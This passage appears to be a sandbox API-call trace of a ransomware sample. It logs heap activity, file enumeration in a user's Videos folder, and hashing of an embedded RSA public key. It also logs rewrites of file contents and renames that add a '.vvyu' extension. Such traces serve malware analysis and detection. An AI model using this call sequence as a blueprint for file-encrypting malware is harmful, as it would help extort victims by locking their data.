hHeap=0x620000) returned 1 [0202.766] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xeb) returned 0x2c73318 [0202.766] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x673558 [0202.767] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x673558 | out: hHeap=0x620000) returned 1 [0202.767] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x673558 [0202.767] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x673558 | out: hHeap=0x620000) returned 1 [0202.767] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c73318 | out: hHeap=0x620000) returned 1 [0202.767] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x2e95d98 [0202.767] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a30 | out: hHeap=0x620000) returned 1 [0202.767] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4c) returned 0x2ccaa80 [0202.767] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a30 [0202.767] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x2e960b0 [0202.768] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78ac0 [0202.768] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea3728 [0202.768] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ac0 | out: hHeap=0x620000) returned 1 [0202.768] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78ac0 [0202.768] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78aa0 [0202.768] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a70 [0202.768] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a90 [0202.768] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a00 [0202.768] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78ad0 [0202.768] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a40 [0202.768] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea36c8 [0202.768] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78aa0 | out: hHeap=0x620000) returned 1 [0202.768] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x2c78aa0 [0202.768] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ac0 | out: hHeap=0x620000) returned 1 [0202.768] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78ac0 [0202.768] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78b00 [0202.768] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78ae0 [0202.768] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78af0 [0202.769] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x2ea36e0 [0202.769] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ae0 | out: hHeap=0x620000) returned 1 [0202.769] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x18) returned 0x2c85d88 [0202.769] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78b00 | out: hHeap=0x620000) returned 1 [0202.769] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea36b0 [0202.769] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78af0 | out: hHeap=0x620000) returned 1 [0202.769] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x2ea3740 [0202.769] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ac0 | out: hHeap=0x620000) returned 1 [0202.769] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x2c78ac0 [0202.769] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ad0 | out: hHeap=0x620000) returned 1 [0202.769] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea3710 [0202.769] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ac0 | out: hHeap=0x620000) returned 1 [0202.769] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea36f8 [0202.769] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a70 | out: hHeap=0x620000) returned 1 [0202.769] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x2ea3758 [0202.770] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea36f8 | out: hHeap=0x620000) returned 1 [0202.770] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x2ea36f8 [0202.770] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea3710 | out: hHeap=0x620000) returned 1 [0202.770] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x2c78a70 [0202.770] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a30 | out: hHeap=0x620000) returned 1 [0202.770] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x14) returned 0x2c85d48 [0202.770] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a70 | out: hHeap=0x620000) returned 1 [0202.770] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1c) returned 0x2e83750 [0202.770] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea36c8 | out: hHeap=0x620000) returned 1 [0202.770] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x2ea36c8 [0202.770] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78aa0 | out: hHeap=0x620000) returned 1 [0202.770] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x204) returned 0x2d08630 [0202.770] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea3728 | out: hHeap=0x620000) returned 1 [0202.770] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x108) returned 0x2c998c8 [0202.770] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea3758 | out: hHeap=0x620000) returned 1 [0202.770] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x210) returned 0x2ea6a68 [0202.771] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83750 | out: hHeap=0x620000) returned 1 [0202.771] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10c) returned 0x2c99af8 [0202.771] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a90 | out: hHeap=0x620000) returned 1 [0202.771] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x108) returned 0x2c99d28 [0202.771] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea36c8 | out: hHeap=0x620000) returned 1 [0202.771] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x200) returned 0x2ea6c80 [0202.771] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c998c8 | out: hHeap=0x620000) returned 1 [0202.771] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x2e95fa8 [0202.771] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a50 | out: hHeap=0x620000) returned 1 [0202.772] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x67c300 | out: hHeap=0x620000) returned 1 [0202.772] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e95d98 | out: hHeap=0x620000) returned 1 [0202.773] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e95fa8 | out: hHeap=0x620000) returned 1 [0202.773] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c85d48 | out: hHeap=0x620000) returned 1 [0202.773] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c99d28 | out: hHeap=0x620000) returned 1 [0202.773] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea6a68 | out: hHeap=0x620000) returned 1 [0202.774] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea6c80 | out: hHeap=0x620000) returned 1 [0202.774] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c99af8 | out: hHeap=0x620000) returned 1 [0202.774] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a00 | out: hHeap=0x620000) returned 1 [0202.774] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea36f8 | out: hHeap=0x620000) returned 1 [0202.774] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a40 | out: hHeap=0x620000) returned 1 [0202.774] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea3740 | out: hHeap=0x620000) returned 1 [0202.774] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c85d88 | out: hHeap=0x620000) returned 1 [0202.774] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea36e0 | out: hHeap=0x620000) returned 1 [0202.774] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea36b0 | out: hHeap=0x620000) returned 1 [0202.774] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e96a80 | out: hHeap=0x620000) returned 1 [0202.775] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9648 | out: hHeap=0x620000) returned 1 [0202.775] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e95b88 | out: hHeap=0x620000) returned 1 [0202.775] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea3698 | out: hHeap=0x620000) returned 1 [0202.775] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea1cc0 | out: hHeap=0x620000) returned 1 [0202.776] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2d08630 | out: hHeap=0x620000) returned 1 [0202.776] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e960b0 | out: hHeap=0x620000) returned 1 [0202.776] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ccaa80 | out: hHeap=0x620000) returned 1 [0202.776] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c99c10 | out: hHeap=0x620000) returned 1 [0202.776] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c85dc8 | out: hHeap=0x620000) returned 1 [0202.776] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ab0 | out: hHeap=0x620000) returned 1 [0202.776] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c85ac8 | out: hHeap=0x620000) returned 1 [0202.777] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c3a5b0 | out: hHeap=0x620000) returned 1 [0202.777] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2d0c3c8 | out: hHeap=0x620000) returned 1 [0202.777] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9610 | out: hHeap=0x620000) returned 1 [0202.778] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2d0d410 | out: hHeap=0x620000) returned 1 [0202.778] WriteFile (in: hFile=0x510, lpBuffer=0x2ea99b0*, nNumberOfBytesToWrite=0x607d, lpNumberOfBytesWritten=0x312fb14, lpOverlapped=0x0 | out: lpBuffer=0x2ea99b0*, lpNumberOfBytesWritten=0x312fb14*=0x607d, lpOverlapped=0x0) returned 1 [0202.778] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea99b0 | out: hHeap=0x620000) returned 1 [0202.778] SetFilePointerEx (in: hFile=0x510, liDistanceToMove=0x6082, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0202.778] WriteFile (in: hFile=0x510, lpBuffer=0x2e95ea0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x312fb50, lpOverlapped=0x0 | out: lpBuffer=0x2e95ea0*, lpNumberOfBytesWritten=0x312fb50*=0x100, lpOverlapped=0x0) returned 1 [0202.779] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e95ea0 | out: hHeap=0x620000) returned 1 [0202.779] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x2cb4728 [0202.779] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x428) returned 0x2ea6a68 [0202.779] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt", cchWideChar=-1, lpMultiByteStr=0x2ea6a68, cbMultiByte=1064, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt", lpUsedDefaultChar=0x0) returned 41 [0202.779] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x430) returned 0x2ea6e98 [0202.779] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea6a68 | out: hHeap=0x620000) returned 1 [0202.780] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cb4728 | out: hHeap=0x620000) returned 1 [0202.780] WriteFile (in: hFile=0x510, lpBuffer=0x2ea6e98*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x312fb50, lpOverlapped=0x0 | out: lpBuffer=0x2ea6e98*, lpNumberOfBytesWritten=0x312fb50*=0x28, lpOverlapped=0x0) returned 1 [0202.780] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea6e98 | out: hHeap=0x620000) returned 1 [0202.780] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0202.780] WriteFile (in: hFile=0x510, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x312fb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x312fb50*=0x26, lpOverlapped=0x0) returned 1 [0202.780] CloseHandle (hObject=0x510) returned 1 [0202.782] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x90) returned 0x2e915e0 [0202.782] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8a0) returned 0x2ea6a68 [0202.782] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e915e0 | out: hHeap=0x620000) returned 1 [0202.782] MoveFileW (lpExistingFileName="C:\\Users\\kEecfMwgj\\Videos\\z2E0zT\\zpV7u7xPWr7qK\\Iwi4py9F_tBuUPcDK.flv" (normalized: "c:\\users\\keecfmwgj\\videos\\z2e0zt\\zpv7u7xpwr7qk\\iwi4py9f_tbuupcdk.flv"), lpNewFileName="C:\\Users\\kEecfMwgj\\Videos\\z2E0zT\\zpV7u7xPWr7qK\\Iwi4py9F_tBuUPcDK.flv.vvyu" (normalized: "c:\\users\\keecfmwgj\\videos\\z2e0zt\\zpv7u7xpwr7qk\\iwi4py9f_tbuupcdk.flv.vvyu")) returned 1 [0202.783] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea6a68 | out: hHeap=0x620000) returned 1 [0202.784] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd96b8 | out: hHeap=0x620000) returned 1 [0202.784] VirtualFree (lpAddress=0x2900000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0202.786] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e91710 | out: hHeap=0x620000) returned 1 [0202.786] FindNextFileW (in: hFindFile=0x2cfe100, lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf4a1f440, ftCreationTime.dwHighDateTime=0x1d89af1, ftLastAccessTime.dwLowDateTime=0x5721a530, ftLastAccessTime.dwHighDateTime=0x1d89e98, ftLastWriteTime.dwLowDateTime=0x5721a530, ftLastWriteTime.dwHighDateTime=0x1d89e98, nFileSizeHigh=0x0, nFileSizeLow=0x144b6, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Nm71rwXGGr4kpL3.mp4", cAlternateFileName="NM71RW~1.MP4")) returned 1 [0202.786] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x2cb4728 [0202.786] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x90) returned 0x2e91710 [0202.787] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cb4728 | out: hHeap=0x620000) returned 1 [0202.787] PathFindExtensionW (pszPath="C:\\Users\\kEecfMwgj\\Videos\\z2E0zT\\zpV7u7xPWr7qK\\Nm71rwXGGr4kpL3.mp4") returned=".mp4" [0202.787] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\Videos\\z2E0zT\\zpV7u7xPWr7qK\\Nm71rwXGGr4kpL3.mp4" (normalized: "c:\\users\\keecfmwgj\\videos\\z2e0zt\\zpv7u7xpwr7qk\\nm71rwxggr4kpl3.mp4"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x510 [0202.787] GetFileSizeEx (in: hFile=0x510, lpFileSize=0x312fb40 | out: lpFileSize=0x312fb40*=83126) returned 1 [0202.787] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x2900000 [0202.790] SetFilePointerEx (in: hFile=0x510, liDistanceToMove=0x14490, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0202.790] ReadFile (in: hFile=0x510, lpBuffer=0x2900000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x312fb78, lpOverlapped=0x0 | out: lpBuffer=0x2900000*, lpNumberOfBytesRead=0x312fb78*=0x26, lpOverlapped=0x0) returned 1 [0202.793] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x2cd96b8 [0202.793] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd96b8 | out: hHeap=0x620000) returned 1 [0202.793] SetFilePointer (in: hFile=0x510, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0202.793] ReadFile (in: hFile=0x510, lpBuffer=0x2900000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x312fb70, lpOverlapped=0x0 | out: lpBuffer=0x2900000*, lpNumberOfBytesRead=0x312fb70*=0x144b6, lpOverlapped=0x0) returned 1 [0202.794] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0202.794] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1f1) returned 0x2d0c3c8 [0202.794] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0202.794] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0202.794] CryptAcquireContextW (in: phProv=0x312fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x312fa50*=0x67c300) returned 1 [0202.795] CryptCreateHash (in: hProv=0x67c300, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x312fa58 | out: phHash=0x312fa58) returned 1 [0202.795] CryptHashData (hHash=0x2cfe1c0, pbData=0x2d0c3c8, dwDataLen=0x1f1, dwFlags=0x0) returned 1 [0202.795] CryptGetHashParam (in: hHash=0x2cfe1c0, dwParam=0x2, pbData=0x0, pdwDataLen=0x312fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x312fa54) returned 1 [0202.795] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x11) returned 0x2c85dc8 [0202.795] CryptGetHashParam (in: hHash=0x2cfe1c0, dwParam=0x2, pbData=0x2c85dc8, pdwDataLen=0x312fa54, dwFlags=0x0 | out: pbData=0x2c85dc8, pdwDataLen=0x312fa54) returned 1 [0202.796] GetLastError () returned 0x0 [0202.796] CryptDestroyHash (hHash=0x2cfe1c0) returned 1 [0202.796] CryptReleaseContext (hProv=0x67c300, dwFlags=0x0) returned 1 [0202.796] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2d0c3c8 | out: hHeap=0x620000) returned 1 [0202.796] UuidCreate (in: Uuid=0x312fa48 | out: Uuid=0x312fa48) returned 0x0 [0202.796] UuidToStringA (in: Uuid=0x312fa48, StringUuid=0x312fa40 | out: StringUuid=0x312fa40) returned 0x0 [0202.796] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x2cd9610 [0202.797] RpcStringFreeA (in: String=0x312fa40 | out: String=0x312fa40) returned 0x0 [0202.797] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd96b8 | out: hHeap=0x620000) returned 1 [0202.797] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x2cd96b8 [0202.797] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x144c0) returned 0x2ea99b0 [0202.797] SetFilePointer (in: hFile=0x510, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0202.798] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9610 | out: hHeap=0x620000) returned 1 [0202.798] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1f0) returned 0x2d0d410 [0202.798] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x2cd9610 [0202.798] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1f0) returned 0x2d0c3c8 [0202.798] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x58) returned 0x2c3a5b0 [0202.798] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2ea1cc0 [0202.798] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea3698 [0202.798] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2ea1d08 [0202.798] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea36b0 [0202.798] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea36e0 [0202.798] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea3740 [0202.798] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea36f8 [0202.798] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x24) returned 0x2cff270 [0202.798] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x158) returned 0x2e98a80 [0202.798] RtlReAllocateHeap (Heap=0x620000, Flags=0x0, Ptr=0x2e98a80, Size=0x218) returned 0x2e9aa80 [0202.798] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x558) returned 0x2ea6a68 [0202.798] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea36e0 | out: hHeap=0x620000) returned 1 [0202.798] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea36f8 | out: hHeap=0x620000) returned 1 [0202.798] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea3740 | out: hHeap=0x620000) returned 1 [0202.799] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cff270 | out: hHeap=0x620000) returned 1 [0202.799] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea6a68 | out: hHeap=0x620000) returned 1 [0202.799] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea3740 [0202.799] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x2c78ab0 [0202.799] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x2ea36f8 [0202.799] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x18) returned 0x2c85ac8 [0202.799] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x9) returned 0x2ea36e0 [0202.799] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x2c78a40 [0202.799] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10e) returned 0x2c99c10 [0202.799] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83750 [0202.799] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x58) returned 0x2c3a610 [0202.799] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x14) returned 0x2c85dc8 [0202.799] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x104) returned 0x2c99af8 [0202.799] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x14) returned 0x2c85d88 [0202.799] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a00 [0202.800] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c99c10 | out: hHeap=0x620000) returned 1 [0202.800] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea36f8 | out: hHeap=0x620000) returned 1 [0202.800] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a40 | out: hHeap=0x620000) returned 1 [0202.800] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea36e0 | out: hHeap=0x620000) returned 1 [0202.800] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c85ac8 | out: hHeap=0x620000) returned 1 [0202.800] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ab0 | out: hHeap=0x620000) returned 1 [0202.800] HeapFree (in: 